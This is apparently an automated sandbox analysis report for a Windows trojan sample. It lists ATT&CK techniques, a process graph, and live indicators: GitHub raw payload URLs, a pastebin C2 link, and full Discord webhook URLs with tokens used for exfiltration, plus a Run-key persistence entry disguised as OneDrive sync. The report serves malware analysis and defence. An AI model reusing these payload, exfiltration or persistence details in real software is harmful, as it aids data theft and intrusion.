Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C52250 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF674C52250
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation
11
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell
1
DLL Side-Loading
11
Registry Run Keys / Startup Folder
131
Virtualization/Sandbox Evasion
LSASS Memory121
Security Software Discovery
Remote Desktop ProtocolData from Removable Media11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
11
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS131
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
Application Window Discovery
SSHKeylogging15
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534108 Sample: OSLdZanXNc.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 84 44 pastebin.com 2->44 46 raw.githubusercontent.com 2->46 48 discord.com 2->48 62 Suricata IDS alerts for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Sigma detected: PowerShell Download and Execution Cradles 2->66 68 Sigma detected: Suspicious PowerShell Parameter Substring 2->68 9 OSLdZanXNc.exe 1 2->9         started        11 forfiles.exe 1 2->11         started        14 forfiles.exe 1 2->14         started        signatures3 70 Connects to a pastebin service (likely for C&C) 44->70 process4 signatures5 16 powershell.exe 12 9->16         started        19 conhost.exe 9->19         started        72 Suspicious powershell command line found 11->72 21 powershell.exe 7 11->21         started        23 conhost.exe 1 11->23         started        25 powershell.exe 14->25         started        27 conhost.exe 1 14->27         started        process6 signatures7 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->56 58 Suspicious powershell command line found 16->58 60 Powershell creates an autostart link 16->60 29 powershell.exe 15 18 16->29         started        34 powershell.exe 13 21->34         started        36 powershell.exe 25->36         started        process8 dnsIp9 50 raw.githubusercontent.com 185.199.109.133, 443, 49711, 49712 FASTLYUS Netherlands 29->50 52 discord.com 162.159.138.232, 443, 55611, 55624 CLOUDFLARENETUS United States 29->52 42 C:\ProgramData\...\BeginSync.lnk, MS 29->42 dropped 74 Tries to open files direct via NTFS file id 29->74 38 conhost.exe 29->38         started        40 attrib.exe 1 29->40         started        54 pastebin.com 104.20.4.235, 443, 55613, 55614 CLOUDFLARENETUS United States 34->54 file10 signatures11 process12

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
OSLdZanXNc.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.138.232
truetrue
    unknown
    raw.githubusercontent.com
    185.199.109.133
    truetrue
      unknown
      pastebin.com
      104.20.4.235
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txtfalse
          unknown
          http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
            unknown
            https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSItrue
              unknown
              https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                unknown
                http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txtfalse
                  unknown
                  http://pastebin.com/raw/sA04Mwk2false
                    unknown
                    https://pastebin.com/raw/sA04Mwk2false
                      unknown
                      https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.microsoft.c4powershell.exe, 0000000C.00000002.2820044032.000001C72A609000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2596705455.0000024217DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://discord.compowershell.exe, 00000004.00000002.2573186277.0000024209A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmptrue
                            unknown
                            https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 00000010.00000002.2859298831.000001D60A4C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2922437661.000001D621E30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A389000.00000004.00000800.00020000.00000000.sdmptrue
                              unknown
                              https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNpowershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmptrue
                                unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 0000000C.00000002.2784074879.000001C712E93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4C4000.00000004.00000800.00020000.00000000.sdmptrue
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://go.micropowershell.exe, 00000004.00000002.2573186277.0000024208BEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71280A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609DF8000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/Licensepowershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/Iconpowershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://raw.githubusercontpowershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmptrue
                                      unknown
                                      https://discord.com/powershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmptrue
                                        unknown
                                        http://discord.compowershell.exe, 00000004.00000002.2573186277.0000024209A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://discord.com/api/webhooks/128545359042878powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmptrue
                                              unknown
                                              https://0.discorpowershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_cryptpowershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://raw.githubusercontent.compowershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207F97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712E2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A418000.00000004.00000800.00020000.00000000.sdmptrue
                                                    unknown
                                                    http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_cryptepowershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://crl.mwpowershell.exe, 0000000C.00000002.2820044032.000001C72A609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://contoso.com/powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2596705455.0000024217DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://raw.githubusercontent.compowershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.000002420920F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712E2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A3E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://raw.githubusercontepowershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://aka.ms/pscore68powershell.exe, 00000004.00000002.2573186277.0000024207C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71235C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60994C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609939000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dllpowershell.exe, 00000004.00000002.2573186277.0000024209236000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.00000242092A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.000002420923F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmptrue
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2573186277.0000024207C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71235C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60994C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://0.discord.com/powershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://pastebin.compowershell.exe, 0000000C.00000002.2784074879.000001C712D5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71280A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712D7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A36A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609DF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A34E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://pastebin.compowershell.exe, 0000000C.00000002.2784074879.000001C712D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A35A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.20.4.235
                                                                    pastebin.comUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    162.159.138.232
                                                                    discord.comUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    185.199.109.133
                                                                    raw.githubusercontent.comNetherlands
                                                                    54113FASTLYUStrue
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1534108
                                                                    Start date and time:2024-10-15 15:53:09 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 4s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:18
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:OSLdZanXNc.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203.exe
                                                                    Detection:MAL
                                                                    Classification:mal84.troj.evad.winEXE@21/16@3/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 33.3%
                                                                    HCA Information:Failed
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target powershell.exe, PID 6988 because it is empty
                                                                    • Execution Graph export aborted for target powershell.exe, PID 7056 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • VT rate limit hit for: OSLdZanXNc.exe
                                                                    TimeTypeDescription
                                                                    09:54:07API Interceptor418x Sleep call for process: powershell.exe modified
                                                                    15:54:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                    15:54:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.20.4.235gaber.ps1Get hashmaliciousUnknownBrowse
                                                                    • pastebin.com/raw/sA04Mwk2
                                                                    cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                    • pastebin.com/raw/sA04Mwk2
                                                                    sostener.vbsGet hashmaliciousNjratBrowse
                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                    sostener.vbsGet hashmaliciousXWormBrowse
                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                    envifa.vbsGet hashmaliciousRemcosBrowse
                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                    New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                    Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                    Update on Payment.jsGet hashmaliciousWSHRATBrowse
                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                    162.159.138.232steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                      cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                        SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                                          SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                                            Exela(1).exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                              SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                http://relay.csgoze520.com/Get hashmaliciousUnknownBrowse
                                                                                  https://hkdiscord.antsoon.com/Get hashmaliciousUnknownBrowse
                                                                                    RebelCracked.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                      lol.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        discord.comBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.137.232
                                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.137.232
                                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.135.232
                                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.138.232
                                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.138.232
                                                                                        Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.135.232
                                                                                        Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.136.232
                                                                                        0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                        • 162.159.137.232
                                                                                        0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                        • 162.159.136.232
                                                                                        cPl7CoJTBx.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                                                        • 162.159.128.233
                                                                                        raw.githubusercontent.comBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 185.199.108.133
                                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 185.199.110.133
                                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.109.133
                                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 185.199.108.133
                                                                                        na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 185.199.109.133
                                                                                        na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                        • 185.199.108.133
                                                                                        oWARzPF1Ms.exeGet hashmaliciousPureLog StealerBrowse
                                                                                        • 185.199.108.133
                                                                                        oWARzPF1Ms.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                        • 185.199.108.133
                                                                                        New PO-RFQ13101.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                        • 185.199.110.133
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.111.161
                                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.137.232
                                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.135.232
                                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.138.232
                                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.138.232
                                                                                        HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.27.206.92
                                                                                        https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.134.42
                                                                                        https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 1.1.1.1
                                                                                        ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.90.114
                                                                                        ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                        • 188.114.96.3
                                                                                        FASTLYUSBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 185.199.108.133
                                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 185.199.110.133
                                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 185.199.108.133
                                                                                        https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.1.229
                                                                                        na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 185.199.109.133
                                                                                        na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                        • 185.199.108.133
                                                                                        ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        Payment(Ssalazar)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.65.229
                                                                                        CLOUDFLARENETUSBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 104.18.111.161
                                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.137.232
                                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.135.232
                                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.138.232
                                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.138.232
                                                                                        HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.27.206.92
                                                                                        https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.134.42
